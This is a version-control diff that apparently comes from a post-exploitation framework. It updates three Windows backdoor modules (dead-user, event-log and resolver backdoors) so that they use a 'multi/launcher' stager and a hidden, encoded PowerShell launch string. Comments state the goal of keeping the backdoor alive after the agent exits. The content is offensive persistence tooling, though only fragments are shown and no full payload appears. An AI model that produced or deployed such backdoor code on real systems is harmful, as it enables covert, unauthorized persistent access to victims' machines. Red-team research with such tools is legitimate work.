Fix powerbreach modules
parent
086df98ed9
commit
b1c359e4b9
|
@ -149,7 +149,7 @@ Invoke-DeadUserBackdoor"""
|
|||
|
||||
else:
|
||||
# set the listener value for the launcher
|
||||
stager = self.mainMenu.stagers.stagers["launcher"]
|
||||
stager = self.mainMenu.stagers.stagers["multi/launcher"]
|
||||
stager.options['Listener']['Value'] = listenerName
|
||||
stager.options['Base64']['Value'] = "False"
|
||||
|
||||
|
@ -188,7 +188,8 @@ Invoke-DeadUserBackdoor"""
|
|||
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
|
||||
# transform the backdoor into something launched by powershell.exe
|
||||
# so it survives the agent exiting
|
||||
launcher = helpers.powershell_launcher(script)
|
||||
modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
|
||||
launcher = helpers.powershell_launcher(script, modifiable_launcher)
|
||||
stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
|
||||
parts = stagerCode.split(" ")
|
||||
|
||||
|
|
|
@ -1,5 +1,6 @@
|
|||
import os
|
||||
from lib.common import helpers
|
||||
import pdb
|
||||
|
||||
class Module:
|
||||
|
||||
|
@ -123,7 +124,7 @@ Invoke-EventLogBackdoor"""
|
|||
|
||||
else:
|
||||
# set the listener value for the launcher
|
||||
stager = self.mainMenu.stagers.stagers["launcher"]
|
||||
stager = self.mainMenu.stagers.stagers["multi/launcher"]
|
||||
stager.options['Listener']['Value'] = listenerName
|
||||
stager.options['Base64']['Value'] = "False"
|
||||
|
||||
|
@ -162,7 +163,8 @@ Invoke-EventLogBackdoor"""
|
|||
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
|
||||
# transform the backdoor into something launched by powershell.exe
|
||||
# so it survives the agent exiting
|
||||
launcher = helpers.powershell_launcher(script)
|
||||
modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
|
||||
launcher = helpers.powershell_launcher(script, modifiable_launcher)
|
||||
stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
|
||||
parts = stagerCode.split(" ")
|
||||
|
||||
|
|
|
@ -136,7 +136,7 @@ Invoke-ResolverBackdoor"""
|
|||
|
||||
else:
|
||||
# set the listener value for the launcher
|
||||
stager = self.mainMenu.stagers.stagers["launcher"]
|
||||
stager = self.mainMenu.stagers.stagers["multi/launcher"]
|
||||
stager.options['Listener']['Value'] = listenerName
|
||||
stager.options['Base64']['Value'] = "False"
|
||||
|
||||
|
@ -175,7 +175,8 @@ Invoke-ResolverBackdoor"""
|
|||
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
|
||||
# transform the backdoor into something launched by powershell.exe
|
||||
# so it survives the agent exiting
|
||||
launcher = helpers.powershell_launcher(script)
|
||||
modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
|
||||
launcher = helpers.powershell_launcher(script, modifiable_launcher)
|
||||
stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
|
||||
parts = stagerCode.split(" ")
|
||||
|
||||
|
|
Loading…
Reference in New Issue